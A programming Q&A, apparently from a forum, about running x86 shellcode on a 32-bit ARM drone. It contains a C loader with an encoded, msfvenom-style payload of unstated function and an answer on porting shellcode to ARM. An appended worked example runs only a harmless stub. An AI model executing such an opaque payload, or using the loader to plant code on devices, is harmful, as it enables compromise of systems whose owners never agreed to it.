
cross compiling shellcode to arm

I am working on a project where I need to execute some shellcode on a drone running Linux on a 32-bit ARM processor. I can communicate with the drone via telnet with the standard BusyBox shell, so I can't run many complex commands, and I cannot compile on the drone itself. I am able to transfer and execute a hello-world program I cross-compiled with "arm-linux-gnueabi-gcc". Now here's the problem: when I try to do exactly the same thing with my x86 shellcode C program, I get the error "Illegal instruction" after running it on the drone.

My C program looks as follows:

#include <string.h>
#include <stdio.h>

/* Payload bytes: x86 (32-bit) machine code, kept in a global, writable array.
 * This is the byte array that ends up inside the ARM build as well. */
unsigned char code[] =
"\xbe\xc6\xfe\xae\xa9\xd9\xea\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x1f\x83\xc3\x04\x31\x73\x11\x03\x73\x11\xe2\x33\x94\xa4\xf7"
"\x8a\xb2\x4e\xe4\xbf\x07\xe2\x81\x3d\x38\x62\xdf\xa0\xf5\xeb"
"\x48\x79\x6e\x2c\xde\xbd\x5d\xc4\x1d\x3d\xb3\x48\xab\xdc\xd9"
"\x16\xf3\x4e\x4f\x80\x8a\x8f\x2c\xe3\x0d\xca\x73\x82\x14\x9a"
"\x07\x48\x4f\x80\xe8\xb2\x8f\x9c\x82\xb2\xe5\x19\xda\x50\xc8"
"\xe8\x11\x16\xae\x2a\xd0\xaa\x5a\x8d\x91\xd2\x25\xd1\xc5\xdc"
"\x55\x58\x06\x1d\xbe\x56\x08\x7d\x4d\xd6\xf7\x4f\xce\x93\xc8"
"\x28\xdf\xc0\x41\x29\x46\x40\x5d\x1a\x7a\x61\xde\xdf\xbd\x01"
"\xdd\x20\xdc\x49\xe0\xde\x1f\xa9\x58\xdf\x1f\xa9\x9e\x2d\x9f";

int main(int argc, char **argv) {
  int foo_value = 0;

  /* Treat the start of the array as a function and jump into it.
   * The memory must be executable for this to work (hence -z execstack). */
  int (*foo)(void) = (int (*)(void))code;
  foo_value = foo();

  printf("%d\n", foo_value);
  return 0;
}

I have compiled this code with the command: arm-linux-gnueabi-gcc -fno-stack-protector -z execstack cprogram.c -o output.elf, and the "file" command outputs:

output.elf: ELF 32-bit LSB pie executable ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=43757152cbcf40dcc6a75cf210c156332557b575, not stripped

Which looks normal to me. This exact same code runs fine on my 64-bit Linux machine when compiled as a 32-bit executable. I have removed the \x00 bytes from the shellcode; I am not sure if there are more bad characters which need to be removed. So my question is: what causes this error, and what would be a way to execute this code correctly on the ARM processor? Thanks!

    unsigned char code[] = "\xbe\xc6\xfe\xae\xa9\xd9\xea\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"

That code is x86 machine instructions.

Of course they wouldn't run on an ARM processor; what else did you expect?

You must find the source of that shellcode (usually a tiny .asm file), translate that .asm from x86 to ARM assembly, compile it to an ARM .o file, and finally use objdump -d to get the equivalent ARM machine code.

Now put that machine code into the code array, rebuild the ARM executable, and enjoy.

PS: You can likely find equivalent shellcode for ARM, saving you some of the steps above.
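A worked example, added here and not part of the question or the answer above: the same kind of loader, written so that the payload bytes are selected for the architecture the binary is built for, and so that it does not rely on -z execstack. The ARM stub is mov r0, #42; bx lr, assembled with arm-linux-gnueabi-as and read off objdump -d exactly as the answer describes; the x86 stub is mov eax, 42; ret. Both return 42 so the result can be checked. The stub bytes, the run_stub() name and the page-sized mapping are this example's own choices, not anything from the page.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#if defined(__arm__)
/* ARM (A32) mode, from objdump -d of the assembled stub:
 *     e3a0002a    mov r0, #42
 *     e12fff1e    bx lr
 * Stored little-endian, which is what a 32-bit LSB ELF target expects. */
static const unsigned char stub[] = {
    0x2a, 0x00, 0xa0, 0xe3,
    0x1e, 0xff, 0x2f, 0xe1,
};
#elif defined(__i386__) || defined(__x86_64__)
/* x86 / x86-64:
 *     b8 2a 00 00 00    mov eax, 42
 *     c3                ret
 * The zero bytes are harmless here: the stub is copied with memcpy and an
 * explicit length, so it is never treated as a C string and "bad characters"
 * do not apply. They only matter when the injection path stops at a NUL. */
static const unsigned char stub[] = {
    0xb8, 0x2a, 0x00, 0x00, 0x00,
    0xc3,
};
#else
#error "no stub for this architecture"
#endif

/* Copy the stub into a fresh anonymous mapping, flip it to RX and call it.
 * Returns the stub's return value, or -1 if the mapping could not be set up. */
int run_stub(void)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) page = 4096;           /* assumption: fall back to 4 KiB */
    size_t len = (size_t)page;

    unsigned char *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;

    memcpy(mem, stub, sizeof stub);

    /* Make the page executable only after writing: no RWX page, and no
     * dependence on how the kernel treats the executable-stack flag. */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }

    /* ARM has separate instruction and data caches; without this the core
     * may fetch stale bytes. It compiles to nothing on x86. */
    __builtin___clear_cache((char *)mem, (char *)mem + sizeof stub);

    /* On ARM, bit 0 of the branch target selects Thumb mode. The stub above
     * is A32 code and mem is page-aligned, so bit 0 is clear. A Thumb payload
     * would need the address ORed with 1 before the call. */
    int (*fn)(void) = (int (*)(void))mem;
    int rc = fn();

    munmap(mem, len);
    return rc;
}

int main(void)
{
    printf("%d\n", run_stub());   /* 42 when the stub matches the CPU */
    return 0;
}
```

Build it for the drone with arm-linux-gnueabi-gcc loader.c -o loader and for the host with plain gcc; each build prints 42 because the preprocessor picks the bytes for the target. Dropping the #if and pasting the x86 array into the ARM build reproduces the question's situation: the CPU decodes x86 bytes as ARM instructions and raises SIGILL on the first one it cannot interpret.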
